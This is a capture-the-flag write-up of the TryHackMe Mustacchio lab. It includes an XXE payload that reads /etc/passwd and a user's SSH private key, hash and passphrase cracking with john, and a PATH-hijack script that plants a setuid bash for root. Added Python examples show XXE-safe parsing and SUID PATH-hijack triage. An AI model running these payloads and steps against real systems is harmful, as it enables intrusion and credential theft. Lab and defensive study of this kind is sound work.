THM WriteUP | Mustacchio

Professional pentester, technical writer, telegram channel owner
Intro
Hello ethical hackers! Today we are going to solve the Mustacchio room on TryHackMe. This lab is tagged PrivEsc and XXE.
Recon
Scanning
To avoid typing the IP again and again, I exported it as a variable in the current bash shell.
export IP=*.*.*.*
Then I scanned the host with rustscan.

Okay, we see SSH and two HTTP servers. I suggest you explore them.
Web recon
http://IP/index.html

http://IP:8765/
Cool! We found the admin panel. I tried some SQL injections to bypass auth, but they didn't work...

Next I ran gobuster against both web servers.
Dirsearching
I often use feroxbuster, and I forward the successful requests through the Burp Suite proxy so the results show up in the site map and in Proxy -> HTTP History. I advise you to do the same.
feroxbuster -u "http://$IP:8765" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --thorough -A -P 127.0.0.1:8080 -E -R 200,301,302,403,500,502

We found an interesting location.
http://IP/custom/js/

I suggest you analyze this file.

We see the SQLite command that creates the user. Great! We
admin:1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
Exploitation
Brute-force the SQLite hash with john (the 40 hex characters are consistent with an unsalted SHA-1):
john sqlite.hash -w=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

Nice! We successfully cracked the hash.
XXE
After logging in, you can add comments to the site.

Try submitting a comment and catch the request with Burp Suite:

After analyzing the response, we found two interesting things:

Download dontforget.bak and cat it:
┌──(kali㉿kali)-[~/temp]
└─$ cat /home/kali/Downloads/dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>This paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
Copy this XML into a new file and edit it:
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>NAME-TEST</name>
<author>AUTHOR-TEST</author>
<com></com>
</comment>

Okay, try an XXE payload against this form:
xml=<?xml+version="1.0"+encoding="UTF-8"?>
<!DOCTYPE+foo+[
+++<!ELEMENT+foo+ANY+>
+++<!ENTITY+xxe+SYSTEM++"file:///etc/passwd"+>]>
<comment>
++<name>NAME-TEST</name>
++<author>AUTHOR-TEST</author>
++<com>&xxe;</com>
</comment>
The + characters are the form-encoded spaces of the POST body as Burp shows them. The &xxe; reference inside <com> is the entity that holds /etc/passwd, so the file contents come back in the response.

Interesting users:

joe:x:1002:1002::/home/joe:/bin/bash
barry:x:1003:1003::/home/barry:/bin/bash
After verifying the XXE, we can read /home/barry/.ssh/id_rsa. Okay, the key is encrypted, so we need the passphrase:
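From the defender's side, the fix for this comment form is to parse the submitted XML with a parser that refuses DTDs altogether, so no entity can ever point at a file. The following Python is an added example, not code from the room or its author: it decodes the xml= form field the way the site would and screens it with the standard-library expat parser, rejecting any DOCTYPE or entity declaration before parsing continues (the same approach defusedxml takes). The two request bodies are constructed from the payloads shown above, and the function and field names are my own.

```python
"""Added example: screen a comment POST for XXE before parsing it (not the room's code)."""
from urllib.parse import unquote_plus
import xml.parsers.expat as expat


class DtdForbidden(ValueError):
    """Raised when submitted XML carries a DOCTYPE or entity declaration."""


def parse_comment_strict(xml_text: str) -> dict:
    """Parse a <comment> document with expat, refusing any DTD.

    The DOCTYPE and entity-declaration callbacks fire before any entity is
    expanded, so a <!DOCTYPE ...> or <!ENTITY ...> is rejected before it can
    be used to pull in file:///etc/passwd or anything else.
    """
    parser = expat.ParserCreate()
    fields: dict = {}
    stack: list = []

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden(f"DOCTYPE declaration for '{name}' is not allowed")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdForbidden(f"entity declaration '{name}' is not allowed")

    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def end(name):
        stack.pop()

    def text(data):
        if stack:
            fields[stack[-1]] += data

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    parser.Parse(xml_text, True)
    # keep the leaf fields only; the root element collects just whitespace
    return {k: v.strip() for k, v in fields.items() if k != "comment"}


def screen_comment_body(form_body: str) -> dict:
    """Decode the 'xml=' form field and decide whether to accept the comment."""
    field, _, raw = form_body.partition("=")
    if field != "xml":
        return {"accepted": False, "reason": "missing xml field"}
    # a real client sends '&' as %26 and spaces as '+'; unquote_plus undoes both
    xml_text = unquote_plus(raw)
    try:
        fields = parse_comment_strict(xml_text)
    except DtdForbidden as exc:
        return {"accepted": False, "reason": str(exc)}
    except expat.ExpatError as exc:
        return {"accepted": False, "reason": f"malformed XML: {exc}"}
    return {"accepted": True, "fields": fields}


# Constructed sample bodies modelled on the requests shown in the write-up.
BENIGN_BODY = (
    'xml=<?xml+version="1.0"+encoding="UTF-8"?>\n'
    "<comment>\n"
    "++<name>NAME-TEST</name>\n"
    "++<author>AUTHOR-TEST</author>\n"
    "++<com>hello</com>\n"
    "</comment>"
)
XXE_BODY = (
    'xml=<?xml+version="1.0"+encoding="UTF-8"?>\n'
    "<!DOCTYPE+foo+[\n"
    "+++<!ELEMENT+foo+ANY+>\n"
    '+++<!ENTITY+xxe+SYSTEM++"file:///etc/passwd"+>]>\n'
    "<comment>\n"
    "++<name>NAME-TEST</name>\n"
    "++<author>AUTHOR-TEST</author>\n"
    "++<com>&xxe;</com>\n"
    "</comment>"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("xxe", XXE_BODY)):
        print(label, screen_comment_body(body))
```

The benign body yields the three fields, while the XXE body is refused with a reason string that can go straight into a log line; the rejection happens in the DOCTYPE callback, before the SYSTEM entity is ever resolved.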

Securing access
Let's crack the id_rsa passphrase:
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt

A successful SSH connection with the key and passphrase:

First flag
barry@mustacchio:~$ ls
user.txt
barry@mustacchio:~$ cat user.txt
******
Privilege Escalation
Analyze the files in the home folders. Nice! We found /home/joe/access_log and the SUID binary /home/joe/live_log. Run strings on the binary:
strings /home/joe/live_log

Okay, live_log calls tail by name rather than by absolute path, so we need a fake tail that gives us a SUID bash. Go to /tmp and create a script named tail:
#!/bin/bash
# copy bash to /tmp and set the setuid bit on the copy
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
Make tail executable, put /tmp at the front of $PATH with export PATH=/tmp:$PATH, and execute the SUID binary live_log. Finally, enter bash -p.
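From a hardening angle, the root cause is a privileged binary that calls a utility by bare name and so trusts whatever PATH the caller supplies. The Python below is an added example, not the room's code: the first function triages strings output from a SUID binary for command strings that invoke a utility without an absolute path, and the second lists PATH entries a low-privileged user could write to (the exact condition the export PATH=/tmp:$PATH step relies on). The sample strings are constructed to resemble what a binary like live_log might contain, not copied from the box, and the function names are my own.

```python
"""Added example (not the room's code): triage a SUID binary for PATH-hijack exposure."""
import os
import shlex
import stat

# Utilities commonly shelled out to; any of them can be shadowed by a same-named
# file placed in a PATH directory that comes first.
KNOWN_COMMANDS = {
    "tail", "head", "cat", "cp", "mv", "rm", "chmod", "chown", "ls", "grep",
    "awk", "sed", "find", "id", "whoami", "sh", "bash", "echo", "service",
}


def relative_command_calls(strings_lines):
    """Return (command, line) pairs for strings that look like shell commands
    invoking a utility without an absolute path.

    Input is the output of `strings` on the binary, one string per element.
    'tail -f /home/joe/access_log' is flagged; '/usr/bin/tail -f ...' is not,
    because the kernel never consults PATH for a path containing a slash.
    """
    findings = []
    for line in strings_lines:
        try:
            tokens = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes: not a command string we can judge
        if not tokens:
            continue
        head = tokens[0]
        if "/" in head:
            continue  # absolute or explicitly relative path: PATH is not used
        if head in KNOWN_COMMANDS:
            findings.append((head, line))
    return findings


def is_world_writable(path):
    """True if path is a directory with the other-write bit set (sticky or not:
    the sticky bit stops deleting others' files, not creating a new 'tail')."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def writable_path_entries(path_value):
    """PATH entries an unprivileged user could plant a binary in: empty or '.'
    entries (current directory) and world-writable directories such as /tmp."""
    return [d for d in path_value.split(":")
            if d in ("", ".") or is_world_writable(d)]


# Constructed sample: a few strings as `strings` might print them for a small
# log-reader binary. Not the real output of live_log.
SAMPLE_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2",
    "setuid",
    "system",
    "Log reader",
    "tail -f /home/joe/access_log",
    "/usr/bin/tail -f /var/log/syslog",
    "GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0",
]

if __name__ == "__main__":
    for cmd, line in relative_command_calls(SAMPLE_STRINGS):
        print(f"bare command {cmd!r} in: {line}")
    print("risky PATH entries:", writable_path_entries(os.environ.get("PATH", "")))
```

Running relative_command_calls over the strings output of each file returned by find / -perm -4000 -type f gives a short list of candidates to review by hand. The fix belongs in the binary: call /usr/bin/tail by absolute path, set a fixed PATH before any system() call, or drop system() in favour of execve with a vetted environment.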